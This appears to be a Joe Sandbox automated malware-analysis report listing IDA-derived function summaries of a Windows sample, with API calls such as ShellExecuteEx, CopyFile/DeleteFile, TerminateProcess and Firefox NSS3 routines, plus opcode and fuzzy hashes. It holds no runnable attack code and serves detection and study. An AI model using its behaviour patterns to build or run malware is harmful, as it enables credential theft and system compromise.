sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CED6D36

Strings

%s at line %d of [%.10s], xrefs: 6CED6D2F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CED6D20
database corruption, xrefs: 6CED6D2A

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 7c10e7c4b2df729ba222a8c170fe4e28511f1d78e7209b44b8ae3655be1fa5ed
Instruction ID: a9af72c466537583440f550a20059dfb514612a545a5efad97b450c08b7c3d88
Opcode Fuzzy Hash: 7c10e7c4b2df729ba222a8c170fe4e28511f1d78e7209b44b8ae3655be1fa5ed
Instruction Fuzzy Hash: 802133307003049BC710DE19E941B9AB7FAAF85308F35892CD8599BB91E370F94ACB92

Function 004168D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
ExitProcess.KERNEL32 ref: 004169F5

Strings

<, xrefs: 00416979

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 7940d977efc3c9dfaf7bf8e85df9b7834848695e8534dadf65a23dad872e0c26
Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
Opcode Fuzzy Hash: 7940d977efc3c9dfaf7bf8e85df9b7834848695e8534dadf65a23dad872e0c26
Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69

Function 6D00CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6D00CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D00CC7B), ref: 6D00CD7A
Part of subcall function 6D00CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D00CD8E
Part of subcall function 6D00CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D00CDA5
Part of subcall function 6D00CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D00CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6D00CCB5
memcpy.VCRUNTIME140(6D0A14F4,6D0A02AC,00000090), ref: 6D00CCD3
memcpy.VCRUNTIME140(6D0A1588,6D0A02AC,00000090), ref: 6D00CD2B

Part of subcall function 6CF29AC0: socket.WSOCK32(?,00000017,6CF299BE), ref: 6CF29AE6
Part of subcall function 6CF29AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CF299BE), ref: 6CF29AFC

Part of subcall function 6CF30590: closesocket.WSOCK32(6CF29A8F,?,?,6CF29A8F,00000000), ref: 6CF30597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6D00CCB0

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 8f67b5422aa04ff1af376529c0ba1ab6da022b152573856f4ea4f48f06e73707
Instruction ID: 6e771983384668c79c4a4735959da871dea114ec949ca0817b0b5aa2096cb4a7
Opcode Fuzzy Hash: 8f67b5422aa04ff1af376529c0ba1ab6da022b152573856f4ea4f48f06e73707
Instruction Fuzzy Hash: 0A1193B5904614EFFB108FBAD925B5A3AB89746258F18002AE90DCB383E77144144BE7

Function 6CF71CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6CF71CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CF71CF1

Part of subcall function 6D0509D0: PR_Now.NSS3 ref: 6D050A22
Part of subcall function 6D0509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D050A35
Part of subcall function 6D0509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D050A66
Part of subcall function 6D0509D0: PR_GetCurrentThread.NSS3 ref: 6D050A70
Part of subcall function 6D0509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D050A9D
Part of subcall function 6D0509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D050AC8
Part of subcall function 6D0509D0: PR_vsmprintf.NSS3(?,?), ref: 6D050AE8
Part of subcall function 6D0509D0: EnterCriticalSection.KERNEL32(?), ref: 6D050B19
Part of subcall function 6D0509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D050B48
Part of subcall function 6D0509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D050C76
Part of subcall function 6D0509D0: PR_LogFlush.NSS3 ref: 6D050C7E

Strings

C_Initialize, xrefs: 6CF71CD3
pInitArgs = 0x%p, xrefs: 6CF71CEC

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize
API String ID: 1907330108-3943720641
Opcode ID: 7224c784e7730929038e4d97409b56e12a688cb94620f3a75447630f82f288e6
Instruction ID: 4edddacbb6a930fe23412f2876d2c6aa402d4205b4c16c39bde6e52bd7b6d9ac
Opcode Fuzzy Hash: 7224c784e7730929038e4d97409b56e12a688cb94620f3a75447630f82f288e6
Instruction Fuzzy Hash: B6019236605104AFDB209B76EE69B5E33B5EBC2359F0C8026E90D97613DB30D849CBA1

Function 00418EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
wsprintfW.USER32 ref: 00418F08

Strings

%hs, xrefs: 00418EFF

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96

Function 0040D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D21940,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
lstrlenA.KERNEL32(00000000), ref: 0040D798
lstrlenA.KERNEL32(00000000), ref: 0040D7AC
DeleteFileA.KERNEL32(00000000), ref: 0040D82B

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 4a0d281e0be7c2a3c81069f0d3361aad7afa3811fa1bf0ac42b05771f60e8d67
Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
Opcode Fuzzy Hash: 4a0d281e0be7c2a3c81069f0d3361aad7afa3811fa1bf0ac42b05771f60e8d67
Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A

Function 6CFB1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CFB1D8F

Part of subcall function 6CFA14C0: TlsGetValue.KERNEL32 ref: 6CFA14E0
Part of subcall function 6CFA14C0: EnterCriticalSection.KERNEL32 ref: 6CFA14F5
Part of subcall function 6CFA14C0: PR_Unlock.NSS3 ref: 6CFA150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CFB1DA6

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CFB1E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFB1ED0

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: 3463b1f9bff40b4647d3fd771a7ca6f751abd691bf9128fe8ca56aad08addc11
Instruction ID: 752906e6db879a1061e8a258ad04721dd2b8b7dd1dde5b434d571c920b721125
Opcode Fuzzy Hash: 3463b1f9bff40b4647d3fd771a7ca6f751abd691bf9128fe8ca56aad08addc11
Instruction Fuzzy Hash: 63515775A00309DFEB14CF99C884BAEB7B6BF49318F148129E819AF751D731E945CB90

Function 6D017DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D017E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D017EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D017EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D017ED8

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: 4cee3493c0a6128436dc1394e3c00ebfb652104f25c97aa399c15963a076140c
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: 9D3172B1A042118FEB04CF48DD90A9ABBE2BFC821471B8169D9595B311EB71EC51CBD1

Function 6CF46C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CF46C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CF46CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CF46CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6D068FE0), ref: 6CF46CFE

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 2b7eb1528cea89382c7e1e6f3aa3240132d30372b6e4f2387e5054d9827a1a43
Instruction ID: 1f3f100c60ec25e694be01707b3b2406eec0104dddd27e78dbef60729e788c3a
Opcode Fuzzy Hash: 2b7eb1528cea89382c7e1e6f3aa3240132d30372b6e4f2387e5054d9827a1a43
Instruction Fuzzy Hash: F23190B5A002169FEB08CF65C891ABFBBF5EF49248F10843DE905E7751EB719905CBA0

Function 6D054F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6D054F5D
free.MOZGLUE(?), ref: 6D054F74
free.MOZGLUE(?), ref: 6D054F82
GetLastError.KERNEL32 ref: 6D054F90

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 655bfa6b6509d50e33212be8cdbe06bc1ac23a145ade94ca78cb3e9f0e547e42
Instruction ID: 415c523e37fc80d205d9b0343a13b0a99f582848a349871422909223a35c1719
Opcode Fuzzy Hash: 655bfa6b6509d50e33212be8cdbe06bc1ac23a145ade94ca78cb3e9f0e547e42
Instruction Fuzzy Hash: 323107B9A0420A6BFB00CB6DDD85BEEB3F8FF89354F014129EC15A7281D734D92587A1

Function 00419660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041967B

Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08

OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
CloseHandle.KERNEL32(00000000), ref: 00419766

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 2d8f03333e4853f93550c0b81daac92beddacb72102df178d504d24997ff0323
Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
Opcode Fuzzy Hash: 2d8f03333e4853f93550c0b81daac92beddacb72102df178d504d24997ff0323
Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56

Function 6CFB6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CFB6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFB6E57

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CFB6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CFB6EAA

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: a0670ad827be1396c358f018984b93221fa2dbc9aaf051f3c5686dc97f9ee297
Instruction ID: 60dc8171de866d2288394bdca3e2776b993ea0a9660984582f258d738f5a4c5d
Opcode Fuzzy Hash: a0670ad827be1396c358f018984b93221fa2dbc9aaf051f3c5686dc97f9ee297
Instruction Fuzzy Hash: D831CE32614612EFEB181F36DC143D7B7A4AB0531AF24063CF999E7A81EB30B454CB85

Function 6CF9DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CF9DDB1,?,00000000), ref: 6CF9DDF4

Part of subcall function 6CFA14C0: TlsGetValue.KERNEL32 ref: 6CFA14E0
Part of subcall function 6CFA14C0: EnterCriticalSection.KERNEL32 ref: 6CFA14F5
Part of subcall function 6CFA14C0: PR_Unlock.NSS3 ref: 6CFA150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CF9DDB1,?,00000000), ref: 6CF9DE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CF9DDB1,?,00000000), ref: 6CF9DE17

